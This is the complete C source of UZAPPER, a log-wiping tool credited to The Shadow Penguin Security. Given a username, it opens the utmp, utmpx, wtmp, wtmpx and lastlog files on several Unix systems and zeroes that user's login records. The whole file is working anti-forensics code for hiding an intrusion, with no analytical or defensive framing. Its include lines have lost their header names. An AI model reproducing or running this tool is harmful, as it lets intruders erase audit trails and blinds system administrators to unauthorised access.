/*============================================================================= UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (unewn4th@usa.net) ============================================================================= */ #include #include #include #include #ifdef UTMAXTYPE #define UTMPX #include #endif #include #ifndef _PATH_LASTLOG #include #endif #include #include #include #define SVR4_UTMP "/var/adm/utmp" #define SVR4_WTMP "/var/adm/wtmp" #define SVR4_LASTLOG "/var/adm/lastlog" #define SUNOS4_UTMP "/etc/utmp" #define SUNOS4_WTMP "/usr/adm/wtmp" #define SUNOS4_LASTLOG "/usr/adm/lastlog" #define BSD_UTMP "/var/run/utmp" #define BSD_WTMP "/var/log/wtmp" #define BSD_LASTLOG "/var/log/lastlog" #define MAX_FPATH 512 int wipe_log(path,user,type) char *path,*user; int type; { struct utmp utmp_ent; #ifdef UTMPX struct utmpx utmpx_ent; #endif void *ent; char *un; int sz,fd,c=0; if (strlen(path)==0) return(1); if (type==0){ ent=(void *)&utmp_ent; #ifdef UTMPX un=(char *)&utmp_ent.ut_user; #else un=(char *)&utmp_ent.ut_name; #endif sz=sizeof(struct utmp); }else{ #ifdef UTMPX ent=(void *)&utmpx_ent; un=(char *)&utmpx_ent.ut_user; sz=sizeof(struct utmpx); #endif } if ((fd=open(path,O_RDWR))<=0) return(-1); while(read(fd,ent,sz)>0) if (!strncmp(un,user,strlen(user))){ memset(ent,0,sz); lseek(fd,-sz,SEEK_CUR); write(fd,ent,sz); c++; } close(fd); printf("Wiped %d entries of %s from %s.\n",c,user,path); return(0); } int wipe_lastlog(path,user,type) char *path,*user; int type; { struct passwd *p; struct lastlog ent; int fd; char buffer[MAX_FPATH]; if (type==0) strcpy(buffer,path); else sprintf(buffer,"%s/%s",path,user); memset(&ent,0,sizeof(struct lastlog)); if ((p=getpwnam(user))==NULL) return(-1); if ((fd=open(buffer,O_RDWR))<=0) return(-2); if (type==0) lseek(fd,p->pw_uid*sizeof(struct lastlog),SEEK_SET); write(fd,&ent,sizeof(struct lastlog)); close(fd); printf("Wiped %s from %s.\n",user,path); return(0); } main(argc,argv) int argc; char *argv[]; { char f_utmp[MAX_FPATH],f_utmpx[MAX_FPATH]; char f_wtmp[MAX_FPATH],f_wtmpx[MAX_FPATH]; char f_lastlog[MAX_FPATH]; struct utsname utname; int lastlog_type; if (argc!=2){ printf("Usage: %s Usernane\n",argv[0]); exit(1); } if (getpwnam(argv[1])==NULL){ printf("Unknown user : %s\n",argv[1]); exit(1); } uname(&utname); strcpy(f_wtmpx,""); strcpy(f_utmpx,""); if (!strcmp(utname.sysname,"SunOS")){ #ifdef UTMPX strcpy(f_utmp, SVR4_UTMP); strcpy(f_wtmp, SVR4_WTMP); strcpy(f_utmpx, UTMPX_FILE); strcpy(f_wtmpx, WTMPX_FILE); strcpy(f_lastlog, SVR4_LASTLOG); lastlog_type=0; #else strcpy(f_utmp, SUNOS4_UTMP); strcpy(f_wtmp, SUNOS4_WTMP); strcpy(f_lastlog, SUNOS4_LASTLOG); lastlog_type=0; #endif }else if (!strcmp(utname.sysname,"Linux") || !strcmp(utname.sysname,"FreeBSD")){ strcpy(f_utmp, BSD_UTMP); strcpy(f_wtmp, BSD_WTMP); strcpy(f_lastlog, BSD_LASTLOG); }else if (!strcmp(utname.sysname,"IRIX")){ #ifdef UTMPX strcpy(f_utmp, SVR4_UTMP); strcpy(f_wtmp, SVR4_WTMP); strcpy(f_utmpx, UTMPX_FILE); strcpy(f_wtmpx, WTMPX_FILE); strcpy(f_lastlog, SVR4_LASTLOG); lastlog_type=1; #else printf("Can not wipe. System Unknown.\n"); #endif }else printf("Can not wipe. System Unknown.\n"); wipe_log(f_utmp, argv[1],0); wipe_log(f_utmpx,argv[1],1); wipe_log(f_wtmp, argv[1],0); wipe_log(f_wtmpx,argv[1],1); wipe_lastlog(f_lastlog,argv[1],lastlog_type); }